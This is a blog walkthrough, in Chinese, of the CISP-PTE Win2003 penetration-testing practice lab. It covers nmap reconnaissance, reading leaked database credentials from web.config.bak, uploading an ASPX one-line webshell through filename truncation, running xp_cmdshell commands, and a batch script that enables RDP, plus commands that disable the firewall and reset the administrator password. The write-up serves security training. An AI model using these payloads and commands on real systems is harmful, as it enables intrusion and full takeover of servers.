靶场实战

CISP-PTE win2003 靶场

CISP-PTE win2003 靶场

Posted by Kyon-H on August 16, 2025

1. 信息搜集

扫描存活主机

1

nmap -sn 192.168.163.0/24

发现靶机:192.168.163.126

image.png

扫描端口

1

nmap -T5 -sS -p- 192.168.163.128

image.png450

操作系统扫描

1

nmap -O 192.168.163.128

image.png450

端口指纹扫描

1

nmap -T5 -sS -sV -p 1433,27689 192.168.163.128

确定为 SQLServer 和 http 服务

image.png450

2. 网站测试

访问网站

image.png

登录测试,用户名:aaaa,密码:1234 提示用户名不存在

image.png500

用户名:admin,密码:123456 提示密码错误,说明存在用户 admin

image.png500

2.1. 目录扫描

image.png

访问 robots.txt 未发现有用信息

image.png

访问 admin 和 upfile 目录无权限

image.png500

访问 web.config.bak 文件

image.png

发现数据库信息:

  • 数据库名:FileManage
  • 用户名:down
  • 密码:downsql

3. 数据库测试

使用 Navicat 连接数据库

image.png500

在 zsb 表中发现 key3

image.png500

发现网站 admin 登录密码:asdadwn_d2112

image.png500

测试当前数据库用户是否有命令执行权限

image.png500

无权限,继续测试网站

4. getshell

登录网站后获取到 key1

image.png500

发现文件上传页面

image.png500

发现文件上传记录,获得提示:

  • 注意:文件名过长会被系统截取包括系统时间在内的前 32 位字符作为文件名,请上传的文件名称不要过长,为您带来的不便,敬请谅解。

利用思路:上传八位字符文件名+aspx 后缀+txt 后缀,上传后 .txt 后缀被截断,保留 .aspx

image.png500

访问图片文件报错,获取到上传文件路径 /upfile/affix/

image.png

访问 636625082296562500-bbbbbbbb.aspx 成功无内容

上传一句话木马,文件名:12345678.aspx.txt

<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>

上传成功,查看记录

image.png500

蚁剑连接成功,发现 key1key.keyweb.config.bak.2017-12-12 文件

image.png500

获取到 key2

image.png500

获取到 sa 账号密码: cisp-pte@sa

image.png

webshell 查看权限,发现权限低

image.png500

5. xp_cmdshell

使用 sa 连接数据库

image.png500

查看权限为 system

image.png500

查找 key 文件

1

EXEC xp_cmdshell 'for /r "c:\" %i in (key.*) do echo %i';

发现桌面存在 key.txt

image.png500

查看内容

1

EXEC xp_cmdshell 'type "c:\Documents and Settings\Administrator\桌\key.txt"';

获取到 key3

image.png500

6. 开启远程桌面

蚁剑上传 3389.bat

1
2
3
4
5
6
7
8
9
10

@REM 3389.bat
echo Windows Registry Editor Version 5.00>>3389.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg 
echo "fDenyTSConnections"=dword:00000000>>3389.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg 
echo "PortNumber"=dword:00000d3d>>3389.reg 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg 
echo "PortNumber"=dword:00000d3d>>3389.reg 
regedit /s 3389.reg 
del 3389.reg

phpmyadmin执行脚本

1
2
3

EXEC xp_cmdshell 'd:\web\3389.bat';
-- 查看端口开发状态
EXEC xp_cmdshell 'netstat -ano';

3389 端口开发,说明脚本执行成功

image.png500

关闭防火墙

1
2
3

EXEC xp_cmdshell 'netsh firewall set opmod disable';
-- 查看防火墙状态
EXEC xp_cmdshell 'netsh firewall show state';

image.png500

nmap 测试 3389 端口状态

1

nmap -p 3389 192.168.163.128

image.png500

修改管理员密码

1

EXEC xp_cmdshell 'net user administrator 123456';

远程桌面连接到 win2003

image.png500

桌面发现 key3

image.png500

CATALOG
    FEATURED TAGS
    DVWA 靶场实战 Vulnhub DC系列 服务器 CTFHub Ubuntu 内网防护